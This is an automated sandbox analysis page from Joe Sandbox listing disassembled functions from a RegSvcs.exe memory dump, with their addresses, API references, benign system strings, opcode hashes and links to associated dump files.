Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction ID: cd7b09cf0c619f6c707a63227835b74fae942d522f5bcf0d4b14858e1994c36c
Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
Instruction Fuzzy Hash: 23C04C757019468FDF15DB59D794F4577E4F754740F1518D0E805CBB21E725E801CA10

Function 0160C68B Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0713b1dd3e5ea7322f9ee299a7a6b13a8c0f2dca38fec79be4c999ec37aa9d38
Instruction ID: 3e38e67144ffef67e577e39893c1bba8d1f8803797cd5e55ff0bf4e2f7466197
Opcode Fuzzy Hash: 0713b1dd3e5ea7322f9ee299a7a6b13a8c0f2dca38fec79be4c999ec37aa9d38
Instruction Fuzzy Hash: BDC09232561461AFC766EB0ACE95F223BA9FF64794F8400A0B109C7662C228E830CB58

Function 0160A060 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e1cf65d9f8c0e9fa4e3eee3b949005c21d4aa932b739b658db39a27f3808d6
Instruction ID: a3f69229c890f8d7e7d289b394cfe099bf79293f33c7180bce5bcb6bb4560773
Opcode Fuzzy Hash: 75e1cf65d9f8c0e9fa4e3eee3b949005c21d4aa932b739b658db39a27f3808d6
Instruction Fuzzy Hash: F6B012730214C19BC72A6B08E901F013765F7C4730F350468F0064F8604A24DC11D604

Function 0163634C Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab27d0e19bc8b3d3cc183f932446174a87e1dae8b67ccaab3f7db6ffdfc867e2
Instruction ID: fd28a74f2f17887c8c8f6b680b608931385edc7c975a24339ac6a0c2e5e8263e
Opcode Fuzzy Hash: ab27d0e19bc8b3d3cc183f932446174a87e1dae8b67ccaab3f7db6ffdfc867e2
Instruction Fuzzy Hash: 82B011B2A02880CBC20ACB88C08CB0033E8FB00A00F0008A0A0028FA02CA28E8008800

Function 0160A950 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581a630ff1c3e78aa7bd7181688fc29c6c476f27700cb95cafc8dc3a50891ae5
Instruction ID: 8ac542153ebbcb2102e2780d9194a7082d31902226c6ac9d0a8977152f696689
Opcode Fuzzy Hash: 581a630ff1c3e78aa7bd7181688fc29c6c476f27700cb95cafc8dc3a50891ae5
Instruction Fuzzy Hash: 2BA02233020883CFCB23BF08CA00F00B330FB80A00FC800E0A0020A830C22CC802CB00

Function 01632BF6 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb6497d98dbca5d8ab111afa168aff7ee6b11b9e5a0af3185f73636f9294bcf1
Instruction ID: b4e3f209b3dbd6325d9460aed6479ccceb921584b0dcbe20009d1fe20529b00a
Opcode Fuzzy Hash: fb6497d98dbca5d8ab111afa168aff7ee6b11b9e5a0af3185f73636f9294bcf1
Instruction Fuzzy Hash: C6B001B6656D80DBD226DB4CD599B1573E4FB04B44F0508A1A8028BA56D22CEA50CA15

Function 01600A50 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b0b307c3be0d404b29e4e027334f1b7dbcccb1ed22bba2e199e3f74ee91561b
Instruction ID: e654977bc97d99429de811e138837ea35f6f4bac54e5e38e0ec28dcf564d8305
Opcode Fuzzy Hash: 3b0b307c3be0d404b29e4e027334f1b7dbcccb1ed22bba2e199e3f74ee91561b
Instruction Fuzzy Hash: 7CA02232020880CFCB0BBF00CE00F003332FB00A80FC080A8B002838B2C22CCC00CA00

Function 01614A80 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 51timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01614A8F

Strings

0Iv, xrefs: 01614AEA, 01614AEF
0Iv, xrefs: 01614ADA
0Iv, xrefs: 01614AFA
0Iv, xrefs: 01614B14
0Iv, xrefs: 01614AD0, 01614AD5
0Iv, xrefs: 01614B04, 01614B09

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Iv$0Iv$0Iv$0Iv$0Iv$0Iv
API String ID: 3446177414-2083360775
Opcode ID: a29ab16aa2a03783886576b247e92db65a1c08c08bfa319abd87e53aa73cf116
Instruction ID: d643e65709ba8f796f23a78d235945001bc27e62ccccad36bc311abbb505f42f
Opcode Fuzzy Hash: a29ab16aa2a03783886576b247e92db65a1c08c08bfa319abd87e53aa73cf116
Instruction Fuzzy Hash: 6F01B532F051519FD7259E28BC097A73BD1B7C5B29F0A209EE9088B788DB604C51D3A4

Function 01612890 Relevance: 9.2, APIs: 6, Instructions: 190COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 0161293C
___swprintf_l.LIBCMT ref: 0161295E
___swprintf_l.LIBCMT ref: 016129A3
___swprintf_l.LIBCMT ref: 0164A52E

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: ___swprintf_l
String ID:
API String ID: 48624451-0
Opcode ID: a84ad75c20e76b955be83d7b7d08a7def6e367b0c8d50d514152ddbdb6f608f7
Instruction ID: a6829fc1494ed08a29d009c1b379e38989a7217fff204e3aacebfd26a27646cd
Opcode Fuzzy Hash: a84ad75c20e76b955be83d7b7d08a7def6e367b0c8d50d514152ddbdb6f608f7
Instruction Fuzzy Hash: CC5105B6A00116BFDB11DFAD8DA097EFBB9BB08240728C62DE465D7645D334DE048BE0

Function 015EA250 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 404COMMON

Download Yara Rule

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016379FA
RtlpFindActivationContextSection_CheckParameters, xrefs: 016379D0, 016379F5
SsHd, xrefs: 015EA3E4
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016379D5

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID:
String ID: RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
API String ID: 0-929470617
Opcode ID: 4d44b402a05b1b824012bf2b179b2e81d594f0426973d0acd1f83c6ef2ac8640
Instruction ID: 308b2044ac5bc959f9777948839ccc8d9a7780523010b562ae49436a0f0e95a4
Opcode Fuzzy Hash: 4d44b402a05b1b824012bf2b179b2e81d594f0426973d0acd1f83c6ef2ac8640
Instruction Fuzzy Hash: 19E1B271A043428FE729CE78C888B6ABBE1BBC9314F144A2DF965CF291D731D945CB52

Function 015ED770 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 372timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0163948C

Strings

SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0163936B
RtlpFindActivationContextSection_CheckParameters, xrefs: 01639341, 01639366
SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01639346
GsHd, xrefs: 015ED874

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: GsHd$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
API String ID: 3446177414-576511823
Opcode ID: 630b09f494967655c678fdc4836b208964e212b1a511bd3748073a930e800cd3
Instruction ID: 5b4eb9cdba1abdd2f7238d9dfd18692e287de594dca5a9324c245eaec4c16463
Opcode Fuzzy Hash: 630b09f494967655c678fdc4836b208964e212b1a511bd3748073a930e800cd3
Instruction Fuzzy Hash: 55E18171A083428FEB24CF58C884B6ABBF5BF88318F045A2DE995CB281D771D945CF52

Function 0161B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0161B6BF

Strings

0, xrefs: 0161B66F
0, xrefs: 0161B695
-, xrefs: 0161B650
+, xrefs: 0161B65A

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: __aulldvrm
String ID: +$-$0$0
API String ID: 1302938615-699404926
Opcode ID: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction ID: cf8ea444b8e580e21110bfaedaec8086839a30b4b3bda6d4a713893810f8fec0
Opcode Fuzzy Hash: 3c0166d9ed1e6585338f8beb812d0714c23e94af90cb0c8803cf42abb3091ffa
Instruction Fuzzy Hash: CA81DE70E012598EEF25CE6CCC907FEBBB2AF55720F1C451AE861A7399C7308841CBA5

Function 015D9126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01632559

Strings

@, xrefs: 015D9175
$, xrefs: 015D9191

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $$@
API String ID: 3446177414-1194432280
Opcode ID: c9e10c4b7decd98f9169b98a59a4a2a57ab22b1f9a79174216e71d0315155b05
Instruction ID: e69fd9672c7834d4cc505d899c1589fd873e7f0d378dea599e4ec067329f5ce9
Opcode Fuzzy Hash: c9e10c4b7decd98f9169b98a59a4a2a57ab22b1f9a79174216e71d0315155b05
Instruction Fuzzy Hash: 73810B71D0026A9BDB35CB58CC55BEEB6B4BF48714F0041DAEA19B7280D7705E85CFA4

Function 01614960 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 016149A4

Strings

0Iv, xrefs: 01614A03
0Iv, xrefs: 01614A23
0Iv, xrefs: 01614A13
X, xrefs: 016149F0

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 0Iv$0Iv$0Iv$X
API String ID: 3446177414-728256981
Opcode ID: e388be656b11472fcc6bb0f7d778b1f4b334980358ee341936c8d2150efb3625
Instruction ID: 4328bcccae752ccbf553287714acb23fa3ab19f6f9e8ec9ee5428b659498a8f1
Opcode Fuzzy Hash: e388be656b11472fcc6bb0f7d778b1f4b334980358ee341936c8d2150efb3625
Instruction Fuzzy Hash: EA31BF3290028AEFCF22DF5CDC04B9D3BA2AB84749F0A501DFD0497259D7748A61CF85

Function 015FDB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 133timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0163F611

Strings

RtlUnlockHeap, xrefs: 0163F65D
, passed to %s, xrefs: 0163F662
Invalid heap signature for heap at %p, xrefs: 0163F653

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlUnlockHeap
API String ID: 3446177414-56086060
Opcode ID: 67787062c7e6e7fe401bbbea92a4629b641737ec645266073bc2c97772349b26
Instruction ID: 5d279b06cdbfa0cc5ad3207dba341c487eb3e1cc033867a7e5df5e168b22f72c
Opcode Fuzzy Hash: 67787062c7e6e7fe401bbbea92a4629b641737ec645266073bc2c97772349b26
Instruction Fuzzy Hash: 5B413631A0064ADFD722DF68C895B6AB7F4FF85724F0045ADD6019F791CB749880CB92

Function 015FDBA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 84timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0163F757

Strings

, passed to %s, xrefs: 0163F7A8
RtlLockHeap, xrefs: 0163F7A3
Invalid heap signature for heap at %p, xrefs: 0163F799

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: , passed to %s$Invalid heap signature for heap at %p$RtlLockHeap
API String ID: 3446177414-3526935505
Opcode ID: 9387ebbab8f17760a49f90d5b254c4de8b19f2fa72f045a5c6ce03eb0f1d497b
Instruction ID: 0ce7c088abce42b50d20d34b720b7f242a96200608f1a14481a3080b933d21a7
Opcode Fuzzy Hash: 9387ebbab8f17760a49f90d5b254c4de8b19f2fa72f045a5c6ce03eb0f1d497b
Instruction Fuzzy Hash: 1931DF31644784DFD7229B68CC0ABAA7BF8FF41B50F04448DE5469B652CBA8A880CB52

Function 015CC070 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 015CC0B4
RtlDebugPrintTimes.NTDLL ref: 0162D623
RtlDebugPrintTimes.NTDLL ref: 0162D651

Strings

$, xrefs: 015CC07C

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000016C9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_15a0000_RegSvcs.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $
API String ID: 3446177414-3993045852
Opcode ID: b4c6064d84eb7ee26684f174fb56d4167af8d2a58ebe72ded0bede584f0bc4d3
Instruction ID: 3d6b281c8f4a936f58e1502c8f0fc76115b806c977d797309cb4c90a94d7a2ba
Opcode Fuzzy Hash: b4c6064d84eb7ee26684f174fb56d4167af8d2a58ebe72ded0bede584f0bc4d3
Instruction Fuzzy Hash: C8115E32904629EFCF25AFA4EC48A9D7B72FF84765F108119F8266B6D0CB315A10CF84

Function 015FEF28 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2166725819.00000000015C6000.00000040.00001000.00020000.00000000.sdmp, Offset: 015A0000, based on PE: true

Associated: 00000009.00000002.2166725819.00000000015A0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.00000000015A7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001620000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001626000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2166725819.0000000001662000.00000040.00001000.00020000.00000000.sdmpDownload File
